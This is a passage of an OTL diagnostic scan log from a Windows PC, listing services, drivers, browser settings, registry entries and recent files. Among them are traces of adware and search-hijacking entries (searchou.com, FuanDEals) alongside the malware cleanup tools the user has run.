PRC - C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe (NVIDIA Corporation)
PRC - C:\Program Files (x86)\Gigabyte\EasySaver\essvr.exe ()
 
 
========== Modules (No Company Name) ==========
 
MOD - C:\Program Files (x86)\Mozilla Firefox\mozjs.dll ()
MOD - C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll ()
MOD - C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll ()
MOD - C:\Program Files (x86)\NVIDIA Corporation\3D Vision\Nv3DVStreaming.dll ()
 
 
========== Services (SafeList) ==========
 
SRV:64bit: - (FLEXnet Licensing Service 64) -- C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService64.exe (Flexera Software, Inc.)
SRV:64bit: - (mi-raysat_3dsmax2012_64) -- C:\Program Files\Autodesk\3ds Max 2012\mentalimages\satellite\raysat_3dsmax2012_64server.exe ()
SRV:64bit: - (AMD External Events Utility) -- C:\Windows\SysNative\atiesrxx.exe (AMD)
SRV:64bit: - (msvsmon90) -- C:\Program Files\Microsoft Visual Studio 9.0\Common7\IDE\Remote Debugger\x64\msvsmon.exe (Microsoft Corporation)
SRV - (AdobeFlashPlayerUpdateSvc) -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe (Adobe Systems Incorporated)
SRV - (DAUpdaterSvc) -- C:\Program Files (x86)\Steam\steamapps\common\Dragon Age Ultimate Edition\bin_ship\DAUpdaterSvc.Service.exe (BioWare)
SRV - (MozillaMaintenance) -- C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe (Mozilla Foundation)
SRV - (ArcService) -- C:\Program Files (x86)\Perfect World Entertainment\Arc\ArcService.exe (Perfect World Entertainment Inc)
SRV - (MBAMService) -- C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe (Malwarebytes Corporation)
SRV - (MBAMScheduler) -- C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe (Malwarebytes Corporation)
SRV - (SkypeUpdate) -- C:\Program Files (x86)\Skype\Updater\Updater.exe (Skype Technologies)
SRV - (AdobeARMservice) -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe (Adobe Systems Incorporated)
SRV - (clr_optimization_v4.0.30319_32) -- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe (Microsoft Corporation)
SRV - (npggsvc) -- C:\Windows\SysWOW64\GameMon.des (INCA Internet Co., Ltd.)
SRV - (VMnetDHCP) -- C:\Windows\SysWOW64\vmnetdhcp.exe (VMware, Inc.)
SRV - (VMware NAT Service) -- C:\Windows\SysWOW64\vmnat.exe (VMware, Inc.)
SRV - (VMAuthdService) -- C:\Program Files (x86)\VMware\VMware Player\vmware-authd.exe (VMware, Inc.)
SRV - (sftvsa) -- C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe (Microsoft Corporation)
SRV - (sftlist) -- C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe (Microsoft Corporation)
SRV - (VMUSBArbService) -- C:\Program Files (x86)\Common Files\VMware\USB\vmware-usbarbitrator64.exe (VMware, Inc.)
SRV - (Steam Client Service) -- C:\Program Files (x86)\Common Files\Steam\SteamService.exe (Valve Corporation)
SRV - (FLEXnet Licensing Service) -- C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe (Macrovision Europe Ltd.)
SRV - (Stereo Service) -- C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe (NVIDIA Corporation)
SRV - (ES lite Service) -- C:\Program Files (x86)\Gigabyte\EasySaver\essvr.exe ()
SRV - (clr_optimization_v2.0.50727_32) -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe (Microsoft Corporation)
SRV - (YahooAUService) -- C:\Program Files (x86)\Yahoo!\SoftwareUpdate\YahooAUService.exe (Yahoo! Inc.)
 
 
========== Driver Services (SafeList) ==========
 
DRV:64bit: - (MBAMProtector) -- C:\Windows\SysNative\drivers\mbam.sys (Malwarebytes Corporation)
DRV:64bit: - (VBoxNetAdp) -- C:\Windows\SysNative\drivers\VBoxNetAdp.sys (Oracle Corporation)
DRV:64bit: - (USBAAPL64) -- C:\Windows\SysNative\drivers\usbaapl64.sys (Apple, Inc.)
DRV:64bit: - (GEARAspiWDM) -- C:\Windows\SysNative\drivers\GEARAspiWDM.sys (GEAR Software Inc.)
DRV:64bit: - (vmx86) -- C:\Windows\SysNative\drivers\vmx86.sys (VMware, Inc.)
DRV:64bit: - (VMparport) -- C:\Windows\SysNative\drivers\VMparport.sys (VMware, Inc.)
DRV:64bit: - (vmkbd) -- C:\Windows\SysNative\drivers\VMkbd.sys (VMware, Inc.)
DRV:64bit: - (VMnetuserif) -- C:\Windows\SysNative\drivers\vmnetuserif.sys (VMware, Inc.)
DRV:64bit: - (VMnetBridge) -- C:\Windows\SysNative\drivers\vmnetbridge.sys (VMware, Inc.)
DRV:64bit: - (VMnetAdapter) -- C:\Windows\SysNative\drivers\vmnetadapter.sys (VMware, Inc.)
DRV:64bit: - (Sftvol) -- C:\Windows\SysNative\drivers\Sftvollh.sys (Microsoft Corporation)
DRV:64bit: - (Sftplay) -- C:\Windows\SysNative\drivers\Sftplaylh.sys (Microsoft Corporation)
DRV:64bit: - (Sftredir) -- C:\Windows\SysNative\drivers\Sftredirlh.sys (Microsoft Corporation)
DRV:64bit: - (Sftfs) -- C:\Windows\SysNative\drivers\Sftfslh.sys (Microsoft Corporation)
DRV:64bit: - (hcmon) -- C:\Windows\SysNative\drivers\hcmon.sys (VMware, Inc.)
DRV:64bit: - (vmci) -- C:\Windows\SysNative\drivers\vmci.sys (VMware, Inc.)
DRV:64bit: - (HpSAMD) -- C:\Windows\SysNative\drivers\HpSAMD.sys (Hewlett-Packard Company)
DRV:64bit: - (amdxata) -- C:\Windows\SysNative\drivers\amdxata.sys (Advanced Micro Devices)
DRV:64bit: - (amdsata) -- C:\Windows\SysNative\drivers\amdsata.sys (Advanced Micro Devices)
DRV:64bit: - (TsUsbFlt) -- C:\Windows\SysNative\drivers\TsUsbFlt.sys (Microsoft Corporation)
DRV:64bit: - (NVHDA) -- C:\Windows\SysNative\drivers\nvhda64v.sys (NVIDIA Corporation)
DRV:64bit: - (amdkmdag) -- C:\Windows\SysNative\drivers\atikmdag.sys (ATI Technologies Inc.)
DRV:64bit: - (amdkmdap) -- C:\Windows\SysNative\drivers\atikmpag.sys (Advanced Micro Devices, Inc.)
DRV:64bit: - (npf) -- C:\Windows\SysNative\drivers\npf.sys (CACE Technologies, Inc.)
DRV:64bit: - (RTHDMIAzAudService) -- C:\Windows\SysNative\drivers\RtHDMIVX.sys (Realtek Semiconductor Corp.)
DRV:64bit: - (nusb3xhc) -- C:\Windows\SysNative\drivers\nusb3xhc.sys (NEC Electronics Corporation)
DRV:64bit: - (nusb3hub) -- C:\Windows\SysNative\drivers\nusb3hub.sys (NEC Electronics Corporation)
DRV:64bit: - (xusb21) -- C:\Windows\SysNative\drivers\xusb21.sys (Microsoft Corporation)
DRV:64bit: - (RTL8167) -- C:\Windows\SysNative\drivers\Rt64win7.sys (Realtek                                            )
DRV:64bit: - (amdsbs) -- C:\Windows\SysNative\drivers\amdsbs.sys (AMD Technologies Inc.)
DRV:64bit: - (LSI_SAS2) -- C:\Windows\SysNative\drivers\lsi_sas2.sys (LSI Corporation)
DRV:64bit: - (Fs_Rec) -- C:\Windows\SysNative\drivers\fs_rec.sys (Microsoft Corporation)
DRV:64bit: - (stexstor) -- C:\Windows\SysNative\drivers\stexstor.sys (Promise Technology)
DRV:64bit: - (RTL8023x64) -- C:\Windows\SysNative\drivers\Rtnic64.sys (Realtek Semiconductor Corporation                           )
DRV:64bit: - (NVENETFD) -- C:\Windows\SysNative\drivers\nvm62x64.sys (NVIDIA Corporation)
DRV:64bit: - (ebdrv) -- C:\Windows\SysNative\drivers\evbda.sys (Broadcom Corporation)
DRV:64bit: - (b06bdrv) -- C:\Windows\SysNative\drivers\bxvbda.sys (Broadcom Corporation)
DRV:64bit: - (b57nd60a) -- C:\Windows\SysNative\drivers\b57nd60a.sys (Broadcom Corporation)
DRV:64bit: - (hcw85cir) -- C:\Windows\SysNative\drivers\hcw85cir.sys (Hauppauge Computer Works, Inc.)
DRV:64bit: - (AX88772) -- C:\Windows\SysNative\drivers\ax88772.sys (ASIX Electronics Corp.)
DRV - (gdrv) -- C:\Windows\gdrv.sys (Windows ® Server 2003 DDK provider)
DRV - (WIMMount) -- C:\Windows\SysWOW64\drivers\wimmount.sys (Microsoft Corporation)
DRV - (NPPTNT2) -- C:\Windows\SysWOW64\npptNT2.sys (INCA Internet Co., Ltd.)
 
 
========== Standard Registry (SafeList) ==========
 
 
========== Internet Explorer ==========
 
IE:64bit: - HKLM\..\SearchScopes,DefaultScope = {9BB47C17-9C68-4BB3-B188-DD9AF0FD2406}
IE:64bit: - HKLM\..\SearchScopes\{050F6D2A-CD2C-4CCF-A95E-9A59CEE646C0}: "URL" = http://www.bing.com/...rc=IE-SearchBox
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
IE - HKLM\..\SearchScopes,DefaultScope =
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...ms}&FORM=IE8SRC
IE - HKLM\..\SearchScopes\{52A54A6E-3E27-4A22-A928-6755ADA9CFFC}: "URL" = http://www.bing.com/...rc=IE-SearchBox
 
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com
IE - HKCU\..\URLSearchHook: {81017EA9-9AA8-4A6A-9734-7AF40E7D593F} - C:\Program Files (x86)\Yahoo!\Companion\Installs\cpn0\yt.dll (Yahoo! Inc.)
IE - HKCU\..\SearchScopes,DefaultScope = {16C1B23E-3CE1-4f7f-A708-A8F88D636FD7}
IE - HKCU\..\SearchScopes\{16C1B23E-3CE1-4f7f-A708-A8F88D636FD7}: "URL" = http://search.yahoo....cevm&type=STDVM
IE - HKCU\..\SearchScopes\{182BD4F4-21ED-4e6c-B65D-F3B9DB6B36AE}: "URL" = http://www.google.co...2788:4067623346
IE - HKCU\..\SearchScopes\{39567D58-C4D9-4285-9C5C-208E15077106}: "URL" = http://www.bing.com/...=SPLBR2&pc=SPLH
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = *.local
 
========== FireFox ==========
 
FF - prefs.js..browser.search.defaultenginename: "Yahoo"
FF - prefs.js..browser.search.defaultenginename,S: S", ""
FF - prefs.js..browser.search.order.1,S: S", ""
FF - prefs.js..browser.search.param.yahoo-fr: "moz2-ytff-sunm"
FF - prefs.js..browser.search.param.yahoo-fr-cjkt: "moz2-ytff-sunm"
FF - prefs.js..browser.search.selectedEngine,S: S", ""
FF - prefs.js..browser.search.useDBForOrder: true
FF - prefs.js..browser.startup.homepage: "http://zassyen.net"
FF - prefs.js..extensions.enabledAddons: %7B73a6fe31-595d-460b-a920-fcc0f8843232%7D:2.6.8.11
FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:26.0
FF - prefs.js..extensions.enabledItems: {73a6fe31-595d-460b-a920-fcc0f8843232}:2.1.0.3
FF - prefs.js..extensions.enabledItems: {CAFEEFAC-0016-0000-0023-ABCDEFFEDCBA}:6.0.23
FF - prefs.js..network.proxy.type: 0
FF - user.js - File not found
 
FF:64bit: - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF64_11_9_900_170.dll File not found
FF:64bit: - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.45.2: C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF:64bit: - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.45.2: C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF:64bit: - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: C:\Windows\system32\Wat\npWatWeb.dll (Microsoft Corporation)
FF:64bit: - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files\Microsoft Silverlight\5.0.61118.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_9_900_170.dll ()
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=:  File not found
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.45.2: C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.45.2: C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: C:\Windows\system32\Wat\npWatWeb.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files (x86)\Microsoft Silverlight\5.0.61118.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/SharePoint,version=14.0: C:\PROGRA~2\MIF5BA~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3502.0922: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3538.0513: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3555.0308: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@nvidia.com/3DVision: C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll (NVIDIA Corporation)
FF - HKLM\Software\MozillaPlugins\@nvidia.com/3DVisionStreaming: C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll (NVIDIA Corporation)
FF - HKLM\Software\MozillaPlugins\@pandonetworks.com/PandoWebPlugin: C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll (Pando Networks)
FF - HKLM\Software\MozillaPlugins\@perfectworld.com/npArcPlayNowPlugin: C:\Program Files (x86)\Perfect World Entertainment\Arc\plugins\npArcPluginFF.dll (Perfect World Entertainment Inc)
FF - HKLM\Software\MozillaPlugins\@playstation.com/PsndlCheck,version=1.00: C:\Program Files (x86)\Sony\PLAYSTATION Network Downloader\nppsndl.dll (Sony Computer Entertainment Inc.)
FF - HKLM\Software\MozillaPlugins\@SonyCreativeSoftware.com/Media Go,version=1.0: C:\Program Files (x86)\Sony\Media Go\npmediago.dll (Sony Network Entertainment International LLC)
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF - HKCU\Software\MozillaPlugins\pandonetworks.com/PandoWebPlugin: C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll (Pando Networks)
FF - HKCU\Software\MozillaPlugins\vitzo.com/VDownloader: C:\Program Files\VDownloader\Addons\npVDownloader.dll (Vitzo)
 
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\support@vdownloader.com: C:\Program Files\VDownloader\Addons\FireFox [2012/11/07 10:42:15 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 26.0\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components [2013/12/11 08:19:51 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 26.0\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins [2014/01/03 15:59:20 | 000,000,000 | ---D | M]
 
[2012/10/12 01:09:57 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Wesley\AppData\Roaming\Mozilla\Extensions
[2014/01/12 08:15:41 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Wesley\AppData\Roaming\Mozilla\Firefox\Profiles\09qn4qhk.default\extensions
[2014/01/12 08:15:41 | 000,536,010 | ---- | M] () (No name found) -- C:\Users\Wesley\AppData\Roaming\Mozilla\Firefox\Profiles\09qn4qhk.default\extensions\{73a6fe31-595d-460b-a920-fcc0f8843232}.xpi
[2014/01/02 08:55:53 | 000,915,554 | ---- | M] () (No name found) -- C:\Users\Wesley\AppData\Roaming\Mozilla\Firefox\Profiles\09qn4qhk.default\extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi
[2013/12/11 08:19:51 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\extensions
[2013/12/11 08:19:51 | 000,000,000 | ---D | M] (Java Console) -- C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0034-ABCDEFFEDCBA}
[2013/12/11 08:19:50 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions
[2013/12/11 08:19:54 | 000,000,000 | ---D | M] (Default) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}
 
========== Chrome  ==========
 
CHR - homepage:
CHR - default_search_provider: Search The Web (privitize) ()
CHR - default_search_provider: search_url = http://searchou.com/...0000050b60df2d6
CHR - default_search_provider: suggest_url =
CHR - homepage: http://searchou.com/...0000050b60df2d6
CHR - plugin: Silverlight 3 (Enabled) = default_plugin
CHR - plugin: Error reading preferences file
CHR - Extension: No name found = C:\Users\Wesley\AppData\Local\Google\Chrome\User Data\Default\Extensions\eoccbpoodnckjdnackiffhjfkogfhnhh\3.2.800\
CHR - Extension: FuanDEals = C:\Users\Wesley\AppData\Local\Google\Chrome\User Data\Default\Extensions\pmjghjlpeglhomoeofllnjbmkfojelei\2.2\
 
O1 HOSTS File: ([2012/05/13 14:52:47 | 000,000,027 | ---- | M]) - C:\Windows\SysNative\drivers\etc\hosts
O1 - Hosts: 127.0.0.1       localhost
O2:64bit: - BHO: (Java™ Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation)
O2:64bit: - BHO: (Java™ Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
O2 - BHO: (Java™ Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
O2 - BHO: (Java™ Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
O4 - HKLM..\Run: [APSDaemon] C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc.)
O4 - HKCU..\Run: [PlayNC Launcher]  File not found
O6 - HKLM\Software\Policies\Microsoft\Internet Explorer\Restrictions present
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableLUA = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: PromptOnSecureDesktop = 0
O7 - HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145
O10:64bit: - NameSpace_Catalog5\Catalog_Entries64\000000000005 [] - C:\Program Files\Bonjour\mdnsNSP.dll (Apple Inc.)
O10:64bit: - Protocol_Catalog9\Catalog_Entries64\000000000011 - C:\Windows\SysNative\vsocklib.dll (VMware, Inc.)
O10:64bit: - Protocol_Catalog9\Catalog_Entries64\000000000012 - C:\Windows\SysNative\vsocklib.dll (VMware, Inc.)
O10 - NameSpace_Catalog5\Catalog_Entries\000000000005 [] - C:\Program Files (x86)\Bonjour\mdnsNSP.dll (Apple Inc.)
O10 - Protocol_Catalog9\Catalog_Entries\000000000011 - C:\Windows\SysWOW64\vsocklib.dll (VMware, Inc.)
O10 - Protocol_Catalog9\Catalog_Entries\000000000012 - C:\Windows\SysWOW64\vsocklib.dll (VMware, Inc.)
O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/...indows-i586.cab (Java Plug-in 10.45.2)
O16 - DPF: {CAFEEFAC-0016-0000-0034-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.6.0_34)
O16 - DPF: {CAFEEFAC-0017-0000-0006-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.7.0_06)
O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab (Java Plug-in 10.45.2)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 75.75.75.75 75.75.76.76
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{13CBDABD-BDF8-4E2E-8B88-A4D9F83A7A58}: DhcpNameServer = 192.168.252.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{3CA9C62F-961E-44AC-995E-48E28CAF140A}: DhcpNameServer = 75.75.75.75 75.75.76.76
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{BB27403B-FA1B-4168-9C7B-4D4092729072}: DhcpNameServer = 68.87.68.166 68.87.74.166
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{EAEDBEA4-03ED-4E5F-BF50-FFDB1C264342}: DhcpNameServer = 75.75.75.75 75.75.76.76
O18:64bit: - Protocol\Handler\livecall - No CLSID value found
O18:64bit: - Protocol\Handler\ms-help - No CLSID value found
O18:64bit: - Protocol\Handler\msnim - No CLSID value found
O18:64bit: - Protocol\Handler\skype4com - No CLSID value found
O18:64bit: - Protocol\Handler\wlmailhtml - No CLSID value found
O18:64bit: - Protocol\Handler\wlpg - No CLSID value found
O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
O20:64bit: - HKLM Winlogon: Shell - (Explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20:64bit: - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (Explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysWOW64\userinit.exe (Microsoft Corporation)
O32 - HKLM CDRom: AutoRun - 1
O32 - AutoRun File - [2013/05/05 09:36:45 | 000,000,000 | ---D | M] - C:\Autodesk -- [ NTFS ]
O34 - HKLM BootExecute: (autocheck autochk *)
O35:64bit: - HKLM\..comfile [open] -- "%1" %*
O35:64bit: - HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:64bit: - HKLM\...com [@ = comfile] -- "%1" %*
O37:64bit: - HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)
 
========== Files/Folders - Created Within 30 Days ==========
 
[2014/01/12 09:43:40 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Common Files\Java
[2014/01/12 09:43:21 | 000,000,000 | ---D | C] -- C:\ProgramData\Oracle
[2014/01/12 09:43:14 | 000,096,168 | ---- | C] (Oracle Corporation) -- C:\Windows\SysWow64\WindowsAccessBridge-32.dll
[2014/01/12 09:26:10 | 000,312,744 | ---- | C] (Oracle Corporation) -- C:\Windows\SysNative\javaws.exe
[2014/01/12 09:26:08 | 000,189,352 | ---- | C] (Oracle Corporation) -- C:\Windows\SysNative\javaw.exe
[2014/01/12 09:26:08 | 000,189,352 | ---- | C] (Oracle Corporation) -- C:\Windows\SysNative\java.exe
[2014/01/12 09:26:08 | 000,108,968 | ---- | C] (Oracle Corporation) -- C:\Windows\SysNative\WindowsAccessBridge-64.dll
[2014/01/12 09:24:41 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java Development Kit
[2014/01/12 09:24:41 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
[2014/01/12 09:24:09 | 000,000,000 | ---D | C] -- C:\Program Files\Java
[2014/01/08 06:45:56 | 000,000,000 | -HSD | C] -- C:\Windows\SysWow64\AI_RecycleBin
[2014/01/07 09:25:17 | 000,000,000 | ---D | C] -- C:\Users\Wesley\AppData\Local\{73C0D583-98F4-46B9-88A1-C49F845DFC0D}
[2014/01/06 10:03:13 | 000,000,000 | ---D | C] -- C:\Users\Wesley\Desktop\Ar Tonelico 1
[2014/01/06 09:51:38 | 000,000,000 | ---D | C] -- C:\Users\Wesley\Desktop\Mp3 Folder
[2014/01/05 12:04:15 | 000,000,000 | ---D | C] -- C:\ProgramData\boost_interprocess
[2014/01/04 04:15:13 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\DeAlEoxipRRESs
[2014/01/04 04:15:10 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\FuanDEals
[2014/01/04 04:00:31 | 000,000,000 | ---D | C] -- C:\_OTL
[2014/01/03 16:07:24 | 000,000,000 | ---D | C] -- C:\Windows\ERUNT
[2014/01/03 16:06:23 | 001,036,305 | ---- | C] (Thisisu) -- C:\Users\Wesley\Desktop\JRT.exe
[2014/01/03 15:50:07 | 000,000,000 | ---D | C] -- C:\AdwCleaner
[2014/01/03 15:24:05 | 000,000,000 | ---D | C] -- C:\Windows\SysNative\SPReview
[2014/01/03 15:23:40 | 000,000,000 | ---D | C] -- C:\Windows\SysNative\EventProviders
[2014/01/03 15:20:31 | 000,000,000 | ---D | C] -- C:\Windows\SysNative\MRT
[2014/01/03 14:57:54 | 002,622,464 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wucltux.dll
[2014/01/03 14:57:54 | 000,057,880 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wuauclt.exe
[2014/01/03 14:57:54 | 000,044,056 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wups2.dll
[2014/01/03 14:57:17 | 000,701,976 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wuapi.dll
[2014/01/03 14:57:17 | 000,099,840 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wudriver.dll
[2014/01/03 14:57:17 | 000,038,424 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wups.dll
[2014/01/03 14:56:39 | 000,186,752 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wuwebv.dll
[2014/01/03 14:56:39 | 000,036,864 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wuapp.exe
[2014/01/03 07:49:25 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\Wesley\Desktop\OTL(1).exe
[2014/01/02 23:21:38 | 004,745,728 | ---- | C] (AVAST Software) -- C:\Users\Wesley\Desktop\aswMBR.exe
[2014/01/02 07:58:28 | 000,388,608 | ---- | C] (Trend Micro Inc.) -- C:\Users\Wesley\Desktop\HiJackThis(1).exe
[2013/12/31 23:48:34 | 000,000,000 | ---D | C] -- C:\Users\Wesley\AppData\Local\Packages
[2013/12/31 23:48:34 | 000,000,000 | ---D | C] -- C:\ProgramData\3bbeb3a6f04741f7
[2013/12/29 13:43:57 | 000,000,000 | ---D | C] -- C:\Users\Wesley\.android
[2013/12/29 13:43:55 | 000,000,000 | ---D | C] -- C:\Users\Wesley\AppData\Local\cache
[2013/12/29 13:43:53 | 000,000,000 | ---D | C] -- C:\Users\Wesley\AppData\Local\genienext
[2013/12/27 11:21:56 | 000,000,000 | ---D | C] -- C:\Users\Wesley\AppData\Local\TGitCache
[2013/12/27 11:20:16 | 000,000,000 | ---D | C] -- C:\Users\Wesley\Documents\src
[2013/12/27 11:20:16 | 000,000,000 | ---D | C] -- C:\Users\Wesley\Documents\bin
[2013/12/27 11:13:12 | 000,000,000 | ---D | C] -- C:\Users\Wesley\AppData\Local\FlashDevelop
